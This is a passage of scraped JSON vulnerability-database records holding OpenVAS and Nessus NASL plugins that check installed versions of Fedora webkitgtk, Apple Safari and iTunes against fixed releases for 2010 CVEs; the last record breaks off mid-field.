["CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1760", "CVE-2010-1783", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1772", "CVE-2010-1664", "CVE-2010-1759", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-2648", "CVE-2010-1774", "CVE-2010-2264", "CVE-2010-1418", "CVE-2010-1790", "CVE-2010-1788", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1665", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1784", "CVE-2010-1762", "CVE-2010-1386", "CVE-2010-1405", "CVE-2010-1421", "CVE-2010-1793"], "description": "Check for the Version of webkitgtk", "modified": "2018-01-24T00:00:00", "published": "2010-09-22T00:00:00", "id": "OPENVAS:1361412562310862410", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862410", "type": "openvas", "title": "Fedora Update for webkitgtk FEDORA-2010-14419", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for webkitgtk FEDORA-2010-14419\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"webkitgtk on Fedora 12\";\ntag_insight = \"WebKitGTK+ is the port of the portable web rendering engine WebKit to the\n GTK+ platform.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-September/047984.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862410\");\n script_version(\"$Revision: 8510 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 08:57:42 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-22 08:32:53 +0200 (Wed, 22 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-14419\");\n script_cve_id(\"CVE-2010-1407\", \"CVE-2010-1405\", \"CVE-2010-1664\", \"CVE-2010-1421\", \"CVE-2010-1760\", \"CVE-2010-1422\", \"CVE-2010-1767\", \"CVE-2010-1771\", \"CVE-2010-2648\", \"CVE-2010-1784\", \"CVE-2010-1785\", \"CVE-2010-1786\", \"CVE-2010-1787\", \"CVE-2010-1780\", \"CVE-2010-1782\", \"CVE-2010-1783\", \"CVE-2010-1788\", \"CVE-2010-1762\", \"CVE-2010-1386\", \"CVE-2010-1761\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1770\", \"CVE-2010-1773\", \"CVE-2010-1772\", \"CVE-2010-1774\", \"CVE-2010-1759\", \"CVE-2010-1758\", \"CVE-2010-1665\", \"CVE-2010-2264\", \"CVE-2010-1793\", \"CVE-2010-1792\", \"CVE-2010-1790\", \"CVE-2010-1392\");\n script_name(\"Fedora Update for webkitgtk FEDORA-2010-14419\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of webkitgtk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk\", rpm:\"webkitgtk~1.2.4~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1760", "CVE-2010-1783", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1772", "CVE-2010-1664", "CVE-2010-1759", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-2648", "CVE-2010-1774", "CVE-2010-2264", "CVE-2010-1418", "CVE-2010-1790", "CVE-2010-1788", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1665", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1784", "CVE-2010-1762", "CVE-2010-1386", "CVE-2010-1405", "CVE-2010-1421", "CVE-2010-1793"], "description": "Check for the Version of webkitgtk", "modified": "2017-12-25T00:00:00", "published": "2010-09-22T00:00:00", "id": "OPENVAS:862410", "href": "http://plugins.openvas.org/nasl.php?oid=862410", "type": "openvas", "title": "Fedora Update for webkitgtk FEDORA-2010-14419", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for webkitgtk FEDORA-2010-14419\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"webkitgtk on Fedora 12\";\ntag_insight = \"WebKitGTK+ is the port of the portable web rendering engine WebKit to the\n GTK+ platform.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-September/047984.html\");\n script_id(862410);\n script_version(\"$Revision: 8243 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 07:30:04 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-22 08:32:53 +0200 (Wed, 22 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-14419\");\n script_cve_id(\"CVE-2010-1407\", \"CVE-2010-1405\", \"CVE-2010-1664\", \"CVE-2010-1421\", \"CVE-2010-1760\", \"CVE-2010-1422\", \"CVE-2010-1767\", \"CVE-2010-1771\", \"CVE-2010-2648\", \"CVE-2010-1784\", \"CVE-2010-1785\", \"CVE-2010-1786\", \"CVE-2010-1787\", \"CVE-2010-1780\", \"CVE-2010-1782\", \"CVE-2010-1783\", \"CVE-2010-1788\", \"CVE-2010-1762\", \"CVE-2010-1386\", \"CVE-2010-1761\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1770\", \"CVE-2010-1773\", \"CVE-2010-1772\", \"CVE-2010-1774\", \"CVE-2010-1759\", \"CVE-2010-1758\", \"CVE-2010-1665\", \"CVE-2010-2264\", \"CVE-2010-1793\", \"CVE-2010-1792\", \"CVE-2010-1790\", \"CVE-2010-1392\");\n script_name(\"Fedora Update for webkitgtk FEDORA-2010-14419\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of webkitgtk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk\", rpm:\"webkitgtk~1.2.4~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-01T05:31:21", "description": "The version of Safari installed on the remote Windows host is earlier\nthan 5.0. As such, it is potentially affected by numerous issues in the\nfollowing components :\n\n - ColorSync\n\n - Safari\n\n - WebKit", "edition": 25, "published": "2010-06-08T00:00:00", "title": "Safari < 5.0 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0544", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-1409", "CVE-2010-1749", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1410", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1385", "CVE-2010-1759", "CVE-2009-1726", "CVE-2010-1384", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-2264", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1119", "CVE-2010-1398", "CVE-2010-1401", "CVE-2010-1413", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1750", "CVE-2010-1402", "CVE-2010-1762", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1399"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "SAFARI_5_0.NASL", "href": "https://www.tenable.com/plugins/nessus/46838", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46838);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/30 11:55:12\");\n\n script_cve_id(\n \"CVE-2009-1726\",\n \"CVE-2010-0544\",\n \"CVE-2010-1119\",\n \"CVE-2010-1384\",\n \"CVE-2010-1385\",\n \"CVE-2010-1389\",\n \"CVE-2010-1390\",\n \"CVE-2010-1391\",\n \"CVE-2010-1392\",\n \"CVE-2010-1393\",\n \"CVE-2010-1394\",\n \"CVE-2010-1395\",\n \"CVE-2010-1396\",\n \"CVE-2010-1397\",\n \"CVE-2010-1398\",\n \"CVE-2010-1399\",\n \"CVE-2010-1400\",\n \"CVE-2010-1401\",\n \"CVE-2010-1402\",\n \"CVE-2010-1403\",\n \"CVE-2010-1404\",\n \"CVE-2010-1405\",\n \"CVE-2010-1406\",\n \"CVE-2010-1408\",\n \"CVE-2010-1409\",\n \"CVE-2010-1410\",\n \"CVE-2010-1412\",\n \"CVE-2010-1413\",\n \"CVE-2010-1414\",\n \"CVE-2010-1415\",\n \"CVE-2010-1416\",\n \"CVE-2010-1417\",\n \"CVE-2010-1418\",\n \"CVE-2010-1419\",\n \"CVE-2010-1421\",\n \"CVE-2010-1422\",\n \"CVE-2010-1749\",\n \"CVE-2010-1750\",\n \"CVE-2010-1758\",\n \"CVE-2010-1759\",\n \"CVE-2010-1761\",\n \"CVE-2010-1762\",\n \"CVE-2010-1764\",\n \"CVE-2010-1770\",\n \"CVE-2010-1771\",\n \"CVE-2010-1774\",\n \"CVE-2010-2264\"\n );\n script_bugtraq_id(\n 40642,\n 40644,\n 40645,\n 40646,\n 40647,\n 40649,\n 40650,\n 40652,\n 40653,\n 40654,\n 40655,\n 40656,\n 40658,\n 40659,\n 40660,\n 40661,\n 40663,\n 40665,\n 40666,\n 40667,\n 40668,\n 40670,\n 40671,\n 40672,\n 40673,\n 40674,\n 40675,\n 40697,\n 40698,\n 40704,\n 40705,\n 40707,\n 40710,\n 40714,\n 40717,\n 40726,\n 40727,\n 40732,\n 40733,\n 40750,\n 40752,\n 40753,\n 40754,\n 40756\n );\n\n script_name(english:\"Safari < 5.0 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Safari's version number\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host contains a web browser that is affected by several\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Safari installed on the remote Windows host is earlier\nthan 5.0. As such, it is potentially affected by numerous issues in the\nfollowing components :\n\n - ColorSync\n\n - Safari\n\n - WebKit\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT4196\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2010/Jun/msg00000.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Safari 5.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"safari_installed.nasl\");\n script_require_keys(\"SMB/Safari/FileVersion\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\npath = get_kb_item(\"SMB/Safari/Path\");\nversion = get_kb_item(\"SMB/Safari/FileVersion\");\nif (isnull(version)) exit(1, \"The 'SMB/Safari/FileVersion' KB item is missing.\");\n\nversion_ui = get_kb_item(\"SMB/Safari/ProductVersion\");\nif (isnull(version_ui)) version_ui = version;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n ver[0] < 5 ||\n (\n ver[0] == 5 &&\n (\n ver[1] < 33 ||\n (ver[1] == 33 && ver[2] < 16)\n )\n )\n)\n{\n if (report_verbosity > 0)\n {\n if (isnull(path)) path = \"n/a\";\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_ui +\n '\\n Fixed version : 5.0\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, \"The remote host is not affected since Safari \" + version_ui + \" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:24:19", "description": "The version of Apple Safari installed on the remote Mac OS X host is\nearlier than 5.0 / 4.1. As such, it is potentially affected by\nnumerous issues in the following components :\n\n - Safari\n\n - WebKit", "edition": 25, "published": "2010-06-08T00:00:00", "title": "Mac OS X : Apple Safari < 5.0 / 4.1", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0544", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-1409", "CVE-2010-1749", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1410", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1385", "CVE-2010-1759", "CVE-2010-1384", "CVE-2010-1388", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-2264", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1119", "CVE-2010-1398", "CVE-2010-1401", "CVE-2010-1413", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1402", "CVE-2010-1762", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1399"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI5_0.NASL", "href": "https://www.tenable.com/plugins/nessus/46837", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46837);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/16 12:48:31\");\n\n script_cve_id(\n \"CVE-2010-0544\",\n \"CVE-2010-1119\",\n \"CVE-2010-1384\",\n \"CVE-2010-1385\",\n \"CVE-2010-1388\",\n \"CVE-2010-1389\",\n \"CVE-2010-1390\",\n \"CVE-2010-1391\",\n \"CVE-2010-1392\",\n \"CVE-2010-1393\",\n \"CVE-2010-1394\",\n \"CVE-2010-1395\",\n \"CVE-2010-1396\",\n \"CVE-2010-1397\",\n \"CVE-2010-1398\",\n \"CVE-2010-1399\",\n \"CVE-2010-1400\",\n \"CVE-2010-1401\",\n \"CVE-2010-1402\",\n \"CVE-2010-1403\",\n \"CVE-2010-1404\",\n \"CVE-2010-1405\",\n \"CVE-2010-1406\",\n \"CVE-2010-1408\",\n \"CVE-2010-1409\",\n \"CVE-2010-1410\",\n \"CVE-2010-1412\",\n \"CVE-2010-1413\",\n \"CVE-2010-1414\",\n \"CVE-2010-1415\",\n \"CVE-2010-1416\",\n \"CVE-2010-1417\",\n \"CVE-2010-1418\",\n \"CVE-2010-1419\",\n \"CVE-2010-1421\",\n \"CVE-2010-1422\",\n \"CVE-2010-1749\",\n \"CVE-2010-1758\",\n \"CVE-2010-1759\",\n \"CVE-2010-1761\",\n \"CVE-2010-1762\",\n \"CVE-2010-1764\",\n \"CVE-2010-1770\",\n \"CVE-2010-1771\",\n \"CVE-2010-1774\",\n \"CVE-2010-2264\"\n );\n script_bugtraq_id(\n 40642,\n 40644,\n 40645,\n 40646,\n 40647,\n 40649,\n 40650,\n 40652,\n 40653,\n 40654,\n 40655,\n 40656,\n 40658,\n 40659,\n 40660,\n 40661,\n 40663,\n 40665,\n 40666,\n 40667,\n 40668,\n 40670,\n 40671,\n 40672,\n 40673,\n 40675,\n 40697,\n 40698,\n 40704,\n 40705,\n 40707,\n 40710,\n 40714,\n 40717,\n 40726,\n 40727,\n 40732,\n 40733,\n 40750,\n 40752,\n 40753,\n 40754,\n 40756\n );\n\n script_name(english:\"Mac OS X : Apple Safari < 5.0 / 4.1\");\n script_summary(english:\"Check the Safari SourceVersion\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host contains a web browser that is affected by several\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apple Safari installed on the remote Mac OS X host is\nearlier than 5.0 / 4.1. As such, it is potentially affected by\nnumerous issues in the following components :\n\n - Safari\n\n - WebKit\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT4196\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2010/Jun/msg00000.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apple Safari 5.0 / 4.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/uname\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nuname = get_kb_item_or_exit(\"Host/uname\");\nif (!egrep(pattern:\"Darwin.* (8\\.|9\\.[0-8]\\.|10\\.)\", string:uname)) audit(AUDIT_OS_NOT, \"Mac OS X 10.4 / 10.5 / 10.6\");\n\n\nget_kb_item_or_exit(\"MacOSX/Safari/Installed\");\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"4.1\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : 5.0 / 4.1\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Safari\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:19:06", "description": "The version of Apple iTunes on the remote host is prior to version\n9.2. It is, therefore, affected by multiple vulnerabilities :\n\n - A heap-based buffer overflow vulnerability exists in the\n handling of images with an embedded ColorSync profile.\n By using a specially crafted image, a remote attacker\n can exploit this to cause a denial of service or execute\n arbitrary code. (CVE-2009-1726)\n\n - Multiple integer overflow vulnerabilities exist in\n ImageIO's handling of TIFF files. By using a specially\n crafted TIFF file, a remote attacker can exploit these\n to cause a denial of service or execute arbitrary code.\n (CVE-2010-1411)\n\n - The WebKit component contains multiple vulnerabilities\n that can be exploited, including the execution of\n arbitrary code.\n (CVE-2010-0544, CVE-2010-1119, CVE-2010-1387,\n CVE-2010-1390, CVE-2010-1392, CVE-2010-1393,\n CVE-2010-1395, CVE-2010-1396, CVE-2010-1397,\n CVE-2010-1398, CVE-2010-1399, CVE-2010-1400,\n CVE-2010-1401, CVE-2010-1402, CVE-2010-1403,\n CVE-2010-1404, CVE-2010-1405, CVE-2010-1408,\n CVE-2010-1409, CVE-2010-1410, CVE-2010-1412,\n CVE-2010-1414, CVE-2010-1415, CVE-2010-1416,\n CVE-2010-1417, CVE-2010-1418, CVE-2010-1419,\n CVE-2010-1421, CVE-2010-1422, CVE-2010-1749,\n CVE-2010-1758, CVE-2010-1759, CVE-2010-1761,\n CVE-2010-1763, CVE-2010-1769, CVE-2010-1770,\n CVE-2010-1771, CVE-2010-1774)", "edition": 27, "published": "2010-06-17T00:00:00", "title": "Apple iTunes < 9.2 Multiple Vulnerabilities (uncredentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0544", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-1409", "CVE-2010-1749", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1410", "CVE-2010-1415", "CVE-2010-1769", "CVE-2010-1419", "CVE-2010-1763", "CVE-2010-1387", "CVE-2010-1759", "CVE-2009-1726", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-1418", "CVE-2010-1119", "CVE-2010-1398", "CVE-2010-1401", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1411", "CVE-2010-1402", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1399"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_9_2_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/47038", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47038);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\n \"CVE-2009-1726\",\n \"CVE-2010-0544\",\n \"CVE-2010-1119\",\n \"CVE-2010-1387\",\n \"CVE-2010-1390\",\n \"CVE-2010-1392\",\n \"CVE-2010-1393\",\n \"CVE-2010-1395\",\n \"CVE-2010-1396\",\n \"CVE-2010-1397\",\n \"CVE-2010-1398\",\n \"CVE-2010-1399\",\n \"CVE-2010-1400\",\n \"CVE-2010-1401\",\n \"CVE-2010-1402\",\n \"CVE-2010-1403\",\n \"CVE-2010-1404\",\n \"CVE-2010-1405\",\n \"CVE-2010-1408\",\n \"CVE-2010-1409\",\n \"CVE-2010-1410\",\n \"CVE-2010-1411\",\n \"CVE-2010-1412\",\n \"CVE-2010-1414\",\n \"CVE-2010-1415\",\n \"CVE-2010-1416\",\n \"CVE-2010-1417\",\n \"CVE-2010-1418\",\n \"CVE-2010-1419\",\n \"CVE-2010-1421\",\n \"CVE-2010-1422\",\n \"CVE-2010-1749\",\n \"CVE-2010-1758\",\n \"CVE-2010-1759\",\n \"CVE-2010-1761\",\n \"CVE-2010-1763\",\n \"CVE-2010-1769\",\n \"CVE-2010-1770\",\n \"CVE-2010-1771\",\n \"CVE-2010-1774\"\n );\n script_bugtraq_id(40657, 40663, 40697, 40710, 41053, 41054, 41125);\n\n script_name(english:\"Apple iTunes < 9.2 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a multimedia application that has multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes on the remote host is prior to version\n9.2. It is, therefore, affected by multiple vulnerabilities :\n\n - A heap-based buffer overflow vulnerability exists in the\n handling of images with an embedded ColorSync profile.\n By using a specially crafted image, a remote attacker\n can exploit this to cause a denial of service or execute\n arbitrary code. (CVE-2009-1726)\n\n - Multiple integer overflow vulnerabilities exist in\n ImageIO's handling of TIFF files. By using a specially\n crafted TIFF file, a remote attacker can exploit these\n to cause a denial of service or execute arbitrary code.\n (CVE-2010-1411)\n\n - The WebKit component contains multiple vulnerabilities\n that can be exploited, including the execution of\n arbitrary code.\n (CVE-2010-0544, CVE-2010-1119, CVE-2010-1387,\n CVE-2010-1390, CVE-2010-1392, CVE-2010-1393,\n CVE-2010-1395, CVE-2010-1396, CVE-2010-1397,\n CVE-2010-1398, CVE-2010-1399, CVE-2010-1400,\n CVE-2010-1401, CVE-2010-1402, CVE-2010-1403,\n CVE-2010-1404, CVE-2010-1405, CVE-2010-1408,\n CVE-2010-1409, CVE-2010-1410, CVE-2010-1412,\n CVE-2010-1414, CVE-2010-1415, CVE-2010-1416,\n CVE-2010-1417, CVE-2010-1418, CVE-2010-1419,\n CVE-2010-1421, CVE-2010-1422, CVE-2010-1749,\n CVE-2010-1758, CVE-2010-1759, CVE-2010-1761,\n CVE-2010-1763, CVE-2010-1769, CVE-2010-1770,\n CVE-2010-1771, CVE-2010-1774)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT4220\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apple.com/archives/security-announce/2010/Jun/msg00002.html\");\n script_set_attribute(attribute:\"solution\", 